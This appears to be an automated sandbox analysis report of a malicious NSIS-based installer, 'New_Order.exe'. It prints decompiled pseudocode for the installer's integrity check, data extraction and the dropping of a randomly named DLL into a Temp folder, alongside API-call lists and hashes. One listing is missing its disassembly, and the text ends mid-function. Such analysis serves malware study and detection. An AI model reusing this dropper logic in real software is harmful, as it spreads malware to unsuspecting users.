                                                                        						L28:
                                                                        						_t94 = GlobalAlloc(0x40, _v24);
                                                                        						E00403300( *0x42f438 + 0x1c);
                                                                        						_push(_v24);
                                                                        						_push(_t94);
                                                                        						_push(_t82);
                                                                        						_push(0xffffffff); // executed
                                                                        						_t57 = E004030D8(); // executed
                                                                        						if(_t57 == _v24) {
                                                                        							 *0x42f434 = _t94;
                                                                        							 *0x42f43c =  *_t94;
                                                                        							if((_v44 & 0x00000001) != 0) {
                                                                        								 *0x42f440 =  *0x42f440 + 1;
                                                                        							}
                                                                        							_t40 = _t94 + 0x44; // 0x44
                                                                        							_t59 = _t40;
                                                                        							_t85 = 8;
                                                                        							do {
                                                                        								_t59 = _t59 - 8;
                                                                        								 *_t59 =  *_t59 + _t94;
                                                                        								_t85 = _t85 - 1;
                                                                        							} while (_t85 != 0);
                                                                        							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                                                        							 *(_t94 + 0x3c) = _t60;
                                                                        							E00405C4B(0x42f460, _t94 + 4, 0x40);
                                                                        							return 0;
                                                                        						}
                                                                        						goto L29;
                                                                        					}
                                                                        					E00403300( *0x41d440);
                                                                        					if(E004032EA( &_a4, 4) == 0 || _v12 != _a4) {
                                                                        						goto L29;
                                                                        					} else {
                                                                        						goto L28;
                                                                        					}
                                                                        				} else {
                                                                        					do {
                                                                        						_t90 = _t93;
                                                                        						asm("sbb eax, eax");
                                                                        						_t70 = ( ~( *0x42f438) & 0x00007e00) + 0x200;
                                                                        						if(_t93 >= _t70) {
                                                                        							_t90 = _t70;
                                                                        						}
                                                                        						if(E004032EA(0x415440, _t90) == 0) {
                                                                        							E00402E3D(1);
                                                                        							L29:
                                                                        							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                                        						}
                                                                        						if( *0x42f438 != 0) {
                                                                        							if((_a4 & 0x00000002) == 0) {
                                                                        								E00402E3D(0);
                                                                        							}
                                                                        							goto L20;
                                                                        						}
                                                                        						E00405C4B( &_v44, 0x415440, 0x1c);
                                                                        						_t77 = _v44;
                                                                        						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
                                                                        							_a4 = _a4 | _t77;
                                                                        							_t87 =  *0x41d440; // 0x53fbf
                                                                        							 *0x42f4e0 =  *0x42f4e0 | _a4 & 0x00000002;
                                                                        							_t80 = _v20;
                                                                        							 *0x42f438 = _t87;
                                                                        							if(_t80 > _t93) {
                                                                        								goto L29;
                                                                        							}
                                                                        							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                                                                        								_v8 = _v8 + 1;
                                                                        								_t24 = _t80 - 4; // 0x40a194
                                                                        								_t93 = _t24;
                                                                        								if(_t90 > _t93) {
                                                                        									_t90 = _t93;
                                                                        								}
                                                                        								goto L20;
                                                                        							} else {
                                                                        								break;
                                                                        							}
                                                                        						}
                                                                        						L20:
                                                                        						if(_t93 <  *0x42944c) {
                                                                        							_v12 = E004065B7(_v12, 0x415440, _t90);
                                                                        						}
                                                                        						 *0x41d440 =  *0x41d440 + _t90;
                                                                        						_t93 = _t93 - _t90;
                                                                        					} while (_t93 != 0);
                                                                        					_t82 = 0;
                                                                        					goto L24;
                                                                        				}
                                                                        			}
                                                                        0x00402f44
                                                                        0x00402f4b
                                                                        0x00402f4d
                                                                        0x00402f4d
                                                                        0x00402f58
                                                                        0x00403080
                                                                        0x00403077
                                                                        0x00000000
                                                                        0x00403077
                                                                        0x00402f65
                                                                        0x00402fe5
                                                                        0x00402fe9
                                                                        0x00402fee
                                                                        0x00000000
                                                                        0x00402fe5
                                                                        0x00402f6e
                                                                        0x00402f73
                                                                        0x00402f7b
                                                                        0x00402fa1
                                                                        0x00402fa7
                                                                        0x00402fb0
                                                                        0x00402fb6
                                                                        0x00402fbb
                                                                        0x00402fc1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00402fcb
                                                                        0x00402fd3
                                                                        0x00402fd6
                                                                        0x00402fd6
                                                                        0x00402fdb
                                                                        0x00402fdd
                                                                        0x00402fdd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00402fcb
                                                                        0x00402fef
                                                                        0x00402ff5
                                                                        0x00403001
                                                                        0x00403001
                                                                        0x00403004
                                                                        0x0040300a
                                                                        0x0040300a
                                                                        0x00403012
                                                                        0x00000000
                                                                        0x00403012

                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 00402EB2
                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\New_Order.exe,00000400), ref: 00402ECE
                                                                          • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\New_Order.exe,80000000,00000003), ref: 00405C94
                                                                          • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                                        • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\New_Order.exe,C:\Users\user\Desktop\New_Order.exe,80000000,00000003), ref: 00402F1A
                                                                        • GlobalAlloc.KERNEL32(00000040,00000020), ref: 00403050
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                        • String ID: "C:\Users\user\Desktop\New_Order.exe" $@TA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\New_Order.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                        • API String ID: 2803837635-2682049167
                                                                        • Opcode ID: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                                        • Instruction ID: b77d5a27d8a3a8735664692b17331c00252a13d20c8f5ee7c59d5cd6c332e3a5
                                                                        • Opcode Fuzzy Hash: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                                        • Instruction Fuzzy Hash: B851E471A00204ABDF20AF64DD85FAF7AB8AB14359F60413BF500B22D1C7B89E858B5D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 61%
                                                                        			E00401759(FILETIME* __ebx, void* __eflags) {
                                                                        				void* _t33;
                                                                        				void* _t41;
                                                                        				void* _t43;
                                                                        				FILETIME* _t49;
                                                                        				FILETIME* _t62;
                                                                        				void* _t64;
                                                                        				signed int _t70;
                                                                        				FILETIME* _t71;
                                                                        				FILETIME* _t75;
                                                                        				signed int _t77;
                                                                        				void* _t80;
                                                                        				CHAR* _t82;
                                                                        				CHAR* _t83;
                                                                        				void* _t85;
                                                                        
                                                                        				_t75 = __ebx;
                                                                        				_t82 = E00402BCE(0x31);
                                                                        				 *(_t85 - 8) = _t82;
                                                                        				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
                                                                        				_t33 = E00405AFC(_t82);
                                                                        				_push(_t82);
                                                                        				_t83 = "GHFGHFGHFDGDFGDFg";
                                                                        				if(_t33 == 0) {
                                                                        					lstrcatA(E00405A8F(E004060F7(_t83, "C:\\Users\\alfons\\AppData\\Local\\Temp")), ??);
                                                                        				} else {
                                                                        					E004060F7();
                                                                        				}
                                                                        				E004063D2(_t83);
                                                                        				while(1) {
                                                                        					__eflags =  *(_t85 + 8) - 3;
                                                                        					if( *(_t85 + 8) >= 3) {
                                                                        						_t64 = E0040646B(_t83);
                                                                        						_t77 = 0;
                                                                        						__eflags = _t64 - _t75;
                                                                        						if(_t64 != _t75) {
                                                                        							_t71 = _t64 + 0x14;
                                                                        							__eflags = _t71;
                                                                        							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
                                                                        						}
                                                                        						asm("sbb eax, eax");
                                                                        						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                                                                        						__eflags = _t70;
                                                                        						 *(_t85 + 8) = _t70;
                                                                        					}
                                                                        					__eflags =  *(_t85 + 8) - _t75;
                                                                        					if( *(_t85 + 8) == _t75) {
                                                                        						E00405C6B(_t83);
                                                                        					}
                                                                        					__eflags =  *(_t85 + 8) - 1;
                                                                        					_t41 = E00405C90(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                                                                        					__eflags = _t41 - 0xffffffff;
                                                                        					 *(_t85 - 0xc) = _t41;
                                                                        					if(_t41 != 0xffffffff) {
                                                                        						break;
                                                                        					}
                                                                        					__eflags =  *(_t85 + 8) - _t75;
                                                                        					if( *(_t85 + 8) != _t75) {
                                                                        						E0040521E(0xffffffe2,  *(_t85 - 8));
                                                                        						__eflags =  *(_t85 + 8) - 2;
                                                                        						if(__eflags == 0) {
                                                                        							 *((intOrPtr*)(_t85 - 4)) = 1;
                                                                        						}
                                                                        						L31:
                                                                        						 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t85 - 4));
                                                                        						__eflags =  *0x42f4c8;
                                                                        						goto L32;
                                                                        					} else {
                                                                        						E004060F7(0x40ac38, 0x430000);
                                                                        						E004060F7(0x430000, _t83);
                                                                        						E0040618A(_t75, 0x40ac38, _t83, "C:\Users\alfons\AppData\Local\Temp\nshC36E.tmp\a9g5j8lkcs3.dll",  *((intOrPtr*)(_t85 - 0x14)));
                                                                        						E004060F7(0x430000, 0x40ac38);
                                                                        						_t62 = E00405813("C:\Users\alfons\AppData\Local\Temp\nshC36E.tmp\a9g5j8lkcs3.dll",  *(_t85 - 0x28) >> 3) - 4;
                                                                        						__eflags = _t62;
                                                                        						if(_t62 == 0) {
                                                                        							continue;
                                                                        						} else {
                                                                        							__eflags = _t62 == 1;
                                                                        							if(_t62 == 1) {
                                                                        								 *0x42f4c8 =  &( *0x42f4c8->dwLowDateTime);
                                                                        								L32:
                                                                        								_t49 = 0;
                                                                        								__eflags = 0;
                                                                        							} else {
                                                                        								_push(_t83);
                                                                        								_push(0xfffffffa);
                                                                        								E0040521E();
                                                                        								L29:
                                                                        								_t49 = 0x7fffffff;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					L33:
                                                                        					return _t49;
                                                                        				}
                                                                        				E0040521E(0xffffffea,  *(_t85 - 8));
                                                                        				 *0x42f4f4 =  *0x42f4f4 + 1;
                                                                        				_push(_t75);
                                                                        				_push(_t75);
                                                                        				_push( *(_t85 - 0xc));
                                                                        				_push( *((intOrPtr*)(_t85 - 0x20)));
                                                                        				_t43 = E004030D8(); // executed
                                                                        				 *0x42f4f4 =  *0x42f4f4 - 1;
                                                                        				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
                                                                        				_t80 = _t43;
                                                                        				if( *(_t85 - 0x1c) != 0xffffffff) {
                                                                        					L22:
                                                                        					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
                                                                        				} else {
                                                                        					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
                                                                        					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
                                                                        						goto L22;
                                                                        					}
                                                                        				}
                                                                        				FindCloseChangeNotification( *(_t85 - 0xc)); // executed
                                                                        				__eflags = _t80 - _t75;
                                                                        				if(_t80 >= _t75) {
                                                                        					goto L31;
                                                                        				} else {
                                                                        					__eflags = _t80 - 0xfffffffe;
                                                                        					if(_t80 != 0xfffffffe) {
                                                                        						E0040618A(_t75, _t80, _t83, _t83, 0xffffffee);
                                                                        					} else {
                                                                        						E0040618A(_t75, _t80, _t83, _t83, 0xffffffe9);
                                                                        						lstrcatA(_t83,  *(_t85 - 8));
                                                                        					}
                                                                        					_push(0x200010);
                                                                        					_push(_t83);
                                                                        					E00405813();
                                                                        					goto L29;
                                                                        				}
                                                                        				goto L33;
                                                                        			}
                                                                        0x00401759
                                                                        0x00401760
                                                                        0x00401769
                                                                        0x0040176c
                                                                        0x0040176f
                                                                        0x00401774
                                                                        0x00401775
                                                                        0x0040177c
                                                                        0x00401798
                                                                        0x0040177e
                                                                        0x0040177f
                                                                        0x0040177f
                                                                        0x0040179e
                                                                        0x004017a8
                                                                        0x004017a8
                                                                        0x004017ac
                                                                        0x004017af
                                                                        0x004017b4
                                                                        0x004017b6
                                                                        0x004017b8
                                                                        0x004017bd
                                                                        0x004017bd
                                                                        0x004017c8
                                                                        0x004017c8
                                                                        0x004017d9
                                                                        0x004017db
                                                                        0x004017db
                                                                        0x004017dc
                                                                        0x004017dc
                                                                        0x004017df
                                                                        0x004017e2
                                                                        0x004017e5
                                                                        0x004017e5
                                                                        0x004017ec
                                                                        0x004017fb
                                                                        0x00401800
                                                                        0x00401803
                                                                        0x00401806
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401808
                                                                        0x0040180b
                                                                        0x00401865
                                                                        0x0040186a
                                                                        0x004015b0
                                                                        0x004027bf
                                                                        0x004027bf
                                                                        0x00402a5a
                                                                        0x00402a5d
                                                                        0x00402a5d
                                                                        0x00000000
                                                                        0x0040180d
                                                                        0x00401813
                                                                        0x0040181e
                                                                        0x0040182b
                                                                        0x00401836
                                                                        0x0040184c
                                                                        0x0040184c
                                                                        0x0040184f
                                                                        0x00000000
                                                                        0x00401855
                                                                        0x00401855
                                                                        0x00401856
                                                                        0x00401873
                                                                        0x00402a63
                                                                        0x00402a63
                                                                        0x00402a63
                                                                        0x00401858
                                                                        0x00401858
                                                                        0x00401859
                                                                        0x00401492
                                                                        0x00402387
                                                                        0x00402387
                                                                        0x00402387
                                                                        0x00401856
                                                                        0x0040184f
                                                                        0x00402a65
                                                                        0x00402a69
                                                                        0x00402a69
                                                                        0x00401883
                                                                        0x00401888
                                                                        0x0040188e
                                                                        0x0040188f
                                                                        0x00401890
                                                                        0x00401893
                                                                        0x00401896
                                                                        0x0040189b
                                                                        0x004018a1
                                                                        0x004018a5
                                                                        0x004018a7
                                                                        0x004018af
                                                                        0x004018bb
                                                                        0x004018a9
                                                                        0x004018a9
                                                                        0x004018ad
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004018ad
                                                                        0x004018c4
                                                                        0x004018ca
                                                                        0x004018cc
                                                                        0x00000000
                                                                        0x004018d2
                                                                        0x004018d2
                                                                        0x004018d5
                                                                        0x004018ed
                                                                        0x004018d7
                                                                        0x004018da
                                                                        0x004018e3
                                                                        0x004018e3
                                                                        0x004018f2
                                                                        0x004018f7
                                                                        0x00402382
                                                                        0x00000000
                                                                        0x00402382
                                                                        0x00000000

                                                                        APIs
                                                                        • lstrcatA.KERNEL32(00000000,00000000,GHFGHFGHFDGDFGDFg,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401798
                                                                        • CompareFileTime.KERNEL32(-00000014,?,GHFGHFGHFDGDFGDFg,GHFGHFGHFDGDFGDFg,00000000,00000000,GHFGHFGHFDGDFGDFg,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017C2
                                                                          • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,Lat Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                                          • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00422448,7519EA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                          • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00422448,7519EA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                          • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00422448,7519EA30), ref: 0040527A
                                                                          • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                                          • Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052B2
                                                                          • Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052CC
                                                                          • Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052DA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                        • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nshC36E.tmp\a9g5j8lkcs3.dll$GHFGHFGHFDGDFGDFg
                                                                        • API String ID: 1941528284-3463827067
                                                                        • Opcode ID: f339b6a59adf296648f3f8b3866004a1f68460c5fd538596058490c9e85b0c89
                                                                        • Instruction ID: bb6028c3778eb4cec0c6c1d7eb8bf073a5325157b60575559d09146ef789c5eb
                                                                        • Opcode Fuzzy Hash: f339b6a59adf296648f3f8b3866004a1f68460c5fd538596058490c9e85b0c89
                                                                        • Instruction Fuzzy Hash: D4419A32900515BACB107BB5CC45DAF3678EF05329F20833FF426B51E1DA7C8A529A6D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 024D1621
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 024D1680
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.240323672.00000000024D0000.00000040.00000001.sdmp, Offset: 024D0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: AllocCreateFileVirtual
                                                                        • String ID: a2f6644de1e4402f88be6b443efc4356
                                                                        • API String ID: 1475775534-42667225
                                                                        • Opcode ID: 40914b9debdb9f1a60f465c20883bf2acf0c80dd880f76990b974c820cf645ed
                                                                        • Instruction ID: d9688bfcf9f7e0a8b3ef233d01f709b3e9abe4105b7fe60fac34c1dcab154527
                                                                        • Opcode Fuzzy Hash: 40914b9debdb9f1a60f465c20883bf2acf0c80dd880f76990b974c820cf645ed
                                                                        • Instruction Fuzzy Hash: 83E15C21E44388EEEF21DBE4DC15BEDBBB5AF05710F10409AEA0CFA191D7B50A85DB16
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 024D0926
                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 024D0AF3
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.240323672.00000000024D0000.00000040.00000001.sdmp, Offset: 024D0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: CreateFileFreeVirtual
                                                                        • String ID:
                                                                        • API String ID: 204039940-0
                                                                        • Opcode ID: cdebcd0448261df0a6f41d09c25969157564de6869333e6711d09fb1921a284e
                                                                        • Instruction ID: 03524b0ede0be462048bfde486cc25845bbce1bf4c6c2b639de6ee0246fc448d
                                                                        • Opcode Fuzzy Hash: cdebcd0448261df0a6f41d09c25969157564de6869333e6711d09fb1921a284e
                                                                        • Instruction Fuzzy Hash: 23A1FE31E00209EFDF10CBE4C995BAEBBB1EF18315F20949AE915BB2A0D3755A91DF10
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 95%
                                                                        			E004030D8(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                                                                        				signed int _v8;
                                                                        				int _v12;
                                                                        				intOrPtr _v16;
                                                                        				long _v20;
                                                                        				intOrPtr _v24;
                                                                        				char _v88;
                                                                        				void* _t65;
                                                                        				void* _t69;
                                                                        				long _t70;
                                                                        				intOrPtr _t75;
                                                                        				long _t76;
                                                                        				intOrPtr _t77;
                                                                        				void* _t78;
                                                                        				int _t88;
                                                                        				intOrPtr _t92;
                                                                        				intOrPtr _t95;
                                                                        				long _t96;
                                                                        				signed int _t97;
                                                                        				int _t98;
                                                                        				int _t99;
                                                                        				intOrPtr _t100;
                                                                        				void* _t101;
                                                                        				void* _t102;
                                                                        
                                                                        				_t97 = _a16;
                                                                        				_t92 = _a12;
                                                                        				_v12 = _t97;
                                                                        				if(_t92 == 0) {
                                                                        					_v12 = 0x8000;
                                                                        				}
                                                                        				_v8 = _v8 & 0x00000000;
                                                                        				_v16 = _t92;
                                                                        				if(_t92 == 0) {
                                                                        					_v16 = 0x421448;
                                                                        				}
                                                                        				_t62 = _a4;
                                                                        				if(_a4 >= 0) {
                                                                        					E00403300( *0x42f498 + _t62);
                                                                        				}
                                                                        				if(E004032EA( &_a16, 4) == 0) {
                                                                        					L41:
                                                                        					_push(0xfffffffd);
                                                                        					goto L42;
                                                                        				} else {
                                                                        					if((_a19 & 0x00000080) == 0) {
                                                                        						if(_t92 != 0) {
                                                                        							if(_a16 < _t97) {
                                                                        								_t97 = _a16;
                                                                        							}
                                                                        							if(E004032EA(_t92, _t97) != 0) {
                                                                        								_v8 = _t97;
                                                                        								L44:
                                                                        								return _v8;
                                                                        							} else {
                                                                        								goto L41;
                                                                        							}
                                                                        						}
                                                                        						if(_a16 <= _t92) {
                                                                        							goto L44;
                                                                        						}
                                                                        						_t88 = _v12;
                                                                        						while(1) {
                                                                        							_t98 = _a16;
                                                                        							if(_a16 >= _t88) {
                                                                        								_t98 = _t88;
                                                                        							}
                                                                        							if(E004032EA(0x41d448, _t98) == 0) {
                                                                        								goto L41;
                                                                        							}
                                                                        							_t69 = E00405D37(_a8, 0x41d448, _t98); // executed
                                                                        							if(_t69 == 0) {
                                                                        								L28:
                                                                        								_push(0xfffffffe);
                                                                        								L42:
                                                                        								_pop(_t65);
                                                                        								return _t65;
                                                                        							}
                                                                        							_v8 = _v8 + _t98;
                                                                        							_a16 = _a16 - _t98;
                                                                        							if(_a16 > 0) {
                                                                        								continue;
                                                                        							}
                                                                        							goto L44;
                                                                        						}
                                                                        						goto L41;
                                                                        					}
                                                                        					_t70 = GetTickCount();
                                                                        					 *0x40bdac =  *0x40bdac & 0x00000000;
                                                                        					 *0x40bda8 =  *0x40bda8 & 0x00000000;
                                                                        					_t14 =  &_a16;
                                                                        					 *_t14 = _a16 & 0x7fffffff;
                                                                        					_v20 = _t70;
                                                                        					 *0x40b890 = 8;
                                                                        					 *0x415438 = 0x40d430;
                                                                        					 *0x415434 = 0x40d430;
                                                                        					 *0x415430 = 0x415430;
                                                                        					_a4 = _a16;
                                                                        					if( *_t14 <= 0) {
                                                                        						goto L44;
                                                                        					} else {
                                                                        						goto L9;
                                                                        					}
                                                                        					while(1) {
                                                                        						L9:
                                                                        						_t99 = 0x4000;
                                                                        						if(_a16 < 0x4000) {
                                                                        							_t99 = _a16;
                                                                        						}
                                                                        						if(E004032EA(0x41d448, _t99) == 0) {
                                                                        							goto L41;
                                                                        						}
                                                                        						_a16 = _a16 - _t99;
                                                                        						 *0x40b880 = 0x41d448;
                                                                        						 *0x40b884 = _t99;
                                                                        						while(1) {
                                                                        							_t95 = _v16;
                                                                        							 *0x40b888 = _t95;
                                                                        							 *0x40b88c = _v12;
                                                                        							_t75 = E00406625(0x40b880);
                                                                        							_v24 = _t75;
                                                                        							if(_t75 < 0) {
                                                                        								break;
                                                                        							}
                                                                        							_t100 =  *0x40b888; // 0x422448
                                                                        							_t101 = _t100 - _t95;
                                                                        							_t76 = GetTickCount();
                                                                        							_t96 = _t76;
                                                                        							if(( *0x42f4f4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
                                                                        								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                                        								_t102 = _t102 + 0xc;
                                                                        								E0040521E(0,  &_v88);
                                                                        								_v20 = _t96;
                                                                        							}
                                                                        							if(_t101 == 0) {
                                                                        								if(_a16 > 0) {
                                                                        									goto L9;
                                                                        								}
                                                                        								goto L44;
                                                                        							} else {
                                                                        								if(_a12 != 0) {
                                                                        									_t77 =  *0x40b888; // 0x422448
                                                                        									_v8 = _v8 + _t101;
                                                                        									_v12 = _v12 - _t101;
                                                                        									_v16 = _t77;
                                                                        									L23:
                                                                        									if(_v24 != 1) {
                                                                        										continue;
                                                                        									}
                                                                        									goto L44;
                                                                        								}
                                                                        								_t78 = E00405D37(_a8, _v16, _t101); // executed
                                                                        								if(_t78 == 0) {
                                                                        									goto L28;
                                                                        								}
                                                                        								_v8 = _v8 + _t101;
                                                                        								goto L23;
                                                                        							}
                                                                        						}
                                                                        						_push(0xfffffffc);
                                                                        						goto L42;
                                                                        					}
                                                                        					goto L41;
                                                                        				}
                                                                        			}
                                                                        0x004030e0
                                                                        0x004030e4
                                                                        0x004030e7
                                                                        0x004030ec
                                                                        0x004030ee
                                                                        0x004030ee
                                                                        0x004030f5
                                                                        0x004030f9
                                                                        0x004030fe
                                                                        0x00403100
                                                                        0x00403100
                                                                        0x00403107
                                                                        0x0040310c
                                                                        0x00403117
                                                                        0x00403117
                                                                        0x00403129
                                                                        0x004032d8
                                                                        0x004032d8
                                                                        0x00000000
                                                                        0x0040312f
                                                                        0x00403133
                                                                        0x00403285
                                                                        0x004032c8
                                                                        0x004032ca
                                                                        0x004032ca
                                                                        0x004032d6
                                                                        0x004032dd
                                                                        0x004032e0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004032d6
                                                                        0x0040328a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040328c
                                                                        0x0040328f
                                                                        0x00403292
                                                                        0x00403295
                                                                        0x00403297
                                                                        0x00403297
                                                                        0x004032a7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004032ae
                                                                        0x004032b5
                                                                        0x0040327f
                                                                        0x0040327f
                                                                        0x004032da
                                                                        0x004032da
                                                                        0x00000000
                                                                        0x004032da
                                                                        Instruction address column only (0x0040313f to 0x004032c3; 0x00000000 entries carry no address): the disassembly text for this listing did not survive export.

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CountTick$wsprintf
                                                                        • String ID: ... %d%%$H$B
                                                                        • API String ID: 551687249-630640294
                                                                        • Opcode ID: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                                        • Instruction ID: fb515496a62f3aa3a261881475cff076317c99cf113f2c02ef85df511ffa7adb
                                                                        • Opcode Fuzzy Hash: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                                        • Instruction Fuzzy Hash: 68515C71900219ABCB10DF95DA44A9E7BA8EF54356F1481BFE800B72D0C7789A41CBAD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004056E4(CHAR* _a4) {
                                                                        				struct _SECURITY_ATTRIBUTES _v16;
                                                                        				struct _SECURITY_DESCRIPTOR _v36;
                                                                        				int _t22;
                                                                        				long _t23;

                                                                        				// Build an absolute security descriptor whose owner, group and DACL are
                                                                        				// fixed blobs in the image (0x408384 / 0x408374), so the directory is
                                                                        				// created with a hard-coded, restrictive ACL rather than the inherited one.
                                                                        				_v36.Sbz1 = 0;
                                                                        				_v36.Owner = 0x408384;
                                                                        				_v36.Group = 0x408384;
                                                                        				_v36.Sacl = 0;
                                                                        				_v16.bInheritHandle = 0;
                                                                        				_v16.lpSecurityDescriptor =  &_v36;
                                                                        				_v36.Revision = 1;                    // SECURITY_DESCRIPTOR_REVISION
